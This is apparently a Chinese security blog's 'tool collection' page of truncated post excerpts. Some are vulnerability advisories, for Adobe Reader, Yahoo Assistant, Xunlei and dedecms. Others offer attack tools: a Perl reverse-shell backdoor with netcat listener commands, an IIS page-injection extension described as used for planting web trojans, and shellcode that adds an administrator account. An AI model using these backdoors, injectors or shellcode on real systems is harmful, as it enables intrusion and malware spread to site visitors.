分类 ‘工具收集’ 下的日志

[Advisory Update]Adobe Reader/Acrobat Remote Vul

[UPDATE]Adobe Reader/Acrobat Remote PDF Print Silently Vulnerability

by cocoruder([email protected])
http://ruder.cdut.net, updated on 2008.05.06

Summary:

A design error vulnerability exists in Adobe Reader and Adobe Acrobat Professional. A remote attacker who successfully exploit this vulnerability can control the printer without user’s permission.

Affected Software Versions:

Adobe Reader 8.1.1 and earlier versions
Adobe Acrobat Professional, 3D and Standard 8.1.1 and earlier versions

Details:

This vulnerablity due to the design error of the javascript fucntion “DOC.print()”, following are the annotates of the function in Adobe’s Javascript API Reference(named “js_api_reference.pdf”):

阅读全文 »

Tags: , , , ,

Yahoo! 助手(3721) ActiveX远程代码执行漏洞

来源:

发现者: Sowhat of Nevis Labs
日期: 2008.05.06

http://hi.baidu.com/secway/blog/item/d9b45dddf0603bdc8d1029a9.html
http://secway.org/advisory/AD20080506EN.txt
http://secway.org/advisory/AD20080506CN.txt

CVE:    N/A

厂商
Yahoo! CN

受影响版本:
Yahoo! Assistant<=3.6 (04/23/2008之前版本)
阅读全文 »

Tags: , ,

迅雷本地溢出POC

作者:疯狗
以前一直在传迅雷还有0day,Activex的应该差不多了,但是也不敢怠慢,还是卸载之,今天丰初发来一URL,原来素一迅雷0day,看说明还是远程!感觉装了一个,看那个漏洞监听的端口
C:\>netstat -na|find “36897”
TCP    127.0.0.1:36897        0.0.0.0:0              LISTENING

绑定的本地IP啊?!那就说明这个是不可以远程的,只能本地了。
……
23132CBE    68 B4C61323     push    2313C6B4                         ; ASCII “savepath”
23132CC3    57              push    edi
23132CC4    FFD6            call    esi
23132CC6    59              pop     ecx
23132CC7    84C0            test    al, al

阅读全文 »

Tags: ,

perl后门,正向和反向

作者:小杰

都是使用nc监听!
反向连接代码:

#!/usr/bin/perl
#usage:
#nc -vv -l -p PORT(default 1988) on your local system first,then
#Perl $0 Remote IP(default 127.0.0.1) Remote_port(default 1988)
#Type 'exit' to exit or press Enter to gain shell when u under the 'console'.
#nc -vv -l -p 1988
#perl backdoor.pl 127.0.0.1 1988    
 阅读全文 »
Tags: ,

IIS_AD IIS扩展源代码

来源:安全警戒线论坛

用于向网页中插入代码,支持iframe以及script 标签。

原本这程序是别人定做的,因为交易方式的分歧,闹的不惶而散。
看到群里有人不知道在那弄到的,当成宝贝是的,既然没交易,就发出来吧。
原本人家是用来挂广告的,让有心人用来挂马用了
原理很简单,就是在IIS应用程序池isapi,特点是解决了win2003假死问题,缩短IIS应用池回收时间。
测试环境WIN2003+IIS XPSP2+IIS    WIN2000没测试。
首先打开GetID.exe获取注册号,运行IIS_AD.exe生成DLL文件,加载到IIS应用池就OK了
有了他服务器任何的一个页面都会有广告代码或者网马代码。
之后修改IIS_AD.ini里的内容:
[IIS_AD]
ADjs=<script language='javascript'>alert('Welcome to User IIS AD !');</script>

支持iframe以及script 标签。

阅读全文 »

Tags:

dedecms v5.1 WriteBookText() code injection vul

来源:Ph4nt0m Google Group
by [email protected]
QQ:378367942


\include\inc_bookfunctions.php
—————————————————
……
function WriteBookText($cid,$body)
{ 阅读全文 »

Tags: ,

两个shellcode

文章作者:pt007[at]vip.sina.com
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。
1、//win2003+sp2下加入一个test11/Test11!!!管理员用户的shellcode:
阅读全文 »

Tags:

CTProxy 1.0 beta

作者:cnqing
来源:cncert

CTProxy beta
软件功能:
可自定义HTTP头的本地代理,源于WVS的HttpSniff(Trap)
使用方法:
1.设置代理端口
2.开启或禁用 trap
3.设置http头,和对应的值,注意保存。
4.设置IE的代理为127.0.0.1 和第一步中的端口
5.Start

注意:需要.net framework环境运行
阅读全文 »

Tags: ,